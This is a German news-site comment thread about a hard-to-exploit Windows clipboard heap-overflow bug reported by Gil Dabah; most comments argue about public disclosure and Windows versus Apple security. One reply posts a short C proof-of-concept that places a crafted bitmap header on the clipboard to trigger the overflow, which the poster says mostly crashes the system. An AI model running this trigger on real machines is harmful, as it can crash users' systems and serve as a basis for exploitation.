Neuer Windows-Fehler lässt sich schwer ausnutzen

Gil Dabah, im Internet unter dem Pseudonym "Arkon" bekannt, macht auf einen Fehler in Windows-Betriebssystemen aufmerksam. Damit lässt sich unter bestimmten Umständen ein Buffer Overflow hervorrufen. mehr...

Diese Nachricht vollständig anzeigen.

Jetzt einen Kommentar schreiben

[o1] am ++5 --12

Das ist schön dass immer die Fehler bekannt gegeben werden, dass noch mehr Hacker aufmerksam gemacht werden spitze.

[re:1] am ++3 --1

@urbanskater: sie werden ja nicht im detail erklärt, also geht das schon

[re:1] am ++5 --2

@Jonathan1: DEVMODE dm = {0};
dm.dmSize = sizeof(DEVMODE);
dm.dmBitsPerPel = 8;
dm.dmPelsWidth = 800;
dm.dmPelsHeight = 600;
dm.dmFields = DM_PELSWIDTH | DM_PELSHEIGHT | DM_BITSPERPEL;
ChangeDisplaySettings(&dm, 0);

BITMAPINFOHEADER bmih = {0};
bmih.biClrUsed = 0×200;

HGLOBAL h = GlobalAlloc(GMEM_FIXED, 0×1000);
memcpy((PVOID)GlobalLock(h), &bmih, sizeof(bmih));
GlobalUnlock(h);

OpenClipboard(NULL);
SetClipboardData(CF_DIBV5, (HANDLE)h);
CloseClipboard();

OpenClipboard(NULL);
GetClipboardData(CF_PALETTE);

der Code ist überall verfügbar. Es ist trotzdem schwer das Teil auszunutzen, weil man den Teil des Heaps kennen muss, der einen Funktionsaufruf nutzt. Das ist nicht vorhersehbar. Vorher gibts eher nen Bluescreen, als das Code ausgeführt wird.

Bearbeitet am 08.08.10 um 13:54 Uhr.

[re:2] am ++20 --3

@urbanskater: bei windows kann man lücken ja öffentlichen machen. sie werden ja so schnell wie möglich und überhaupt von microsoft gestopft. und das sogar kostenlos. ganz im gegensatz zu apple, wo jede menge löcher vorhanden sind, diese verleugnet werden und man für das nächste, fehlerbereinigte update, die nachfolgeversion, auch noch zahlen muß. bei apple gibst keine updates und patches zum löcher stopfen zwischendurch.

Bearbeitet am 08.08.10 um 14:37 Uhr.

[re:1] am ++9 --9

@karl marx: Jetzt hör doch mal auf zu behaupten Apple hat Sicherheitlücken. Also ich kann dir Linux und Windows OS zeigen, die haben auch Sicherheitslücken. Also ist das bei Appel doch garnicht so schlimm. XD Edit: Ok, der Witz kam wohl nicht wirklich an bei allen. ^^

Bearbeitet am 08.08.10 um 16:28 Uhr.

[re:1] am ++1 --5

@Mandharb: hast von mir für diesen tiefsinnigen humor ein plus bekommen. :-)

[re:2] am ++1 --1

@karl marx: Ist doch egal ob es bei Apple sicherheitslücken gibt. Wär ich ein Hacker, würde ich mich auf die Betriebssysteme konzentrieren, die auch von der breiten Masse genutzt werden.... ja und dann wären wir wieder bei Microsoft ^^

[re:1] am ++--

@Naasir: Richtig, warum unnötig zeit in ein Betriebssystem stecken das grad mal ne Handvoll Menschen benutzten...

[re:3] am ++1 --

@urbanskater: leicht auszunutzende Fehler werden zudem von solchen Personen / Firmen erst detailliert erklärt, wenn der Hersteller einen Patch veröffentlicht hat.
Siehe der jährliche Hacking-Contest in Las Vegas

[re:4] am ++2 --

@urbanskater: Naja bei der Lücke ist das nicht problematisch. Wie der Entdecker schrieb ist die Lücke fast unbedenklich und lässt sich sehr schwer ausnutzen, weswegen er keine Gefahr darin sah die Infos zu veröffentlichen.

[o2] am ++3 --3

Manche der Fehlerentdecker leiden wohl auch an Mediengeilheit und wollen nur die Aufmerksamkeit auf sich lenken. Wenn man die Fehler nicht oder nur extrem schwer ausnutzen kann dann muß man doch nicht so einen großen Wirbel machen. Mal schaun wie viele hundert News dazu wieder hier erscheinen.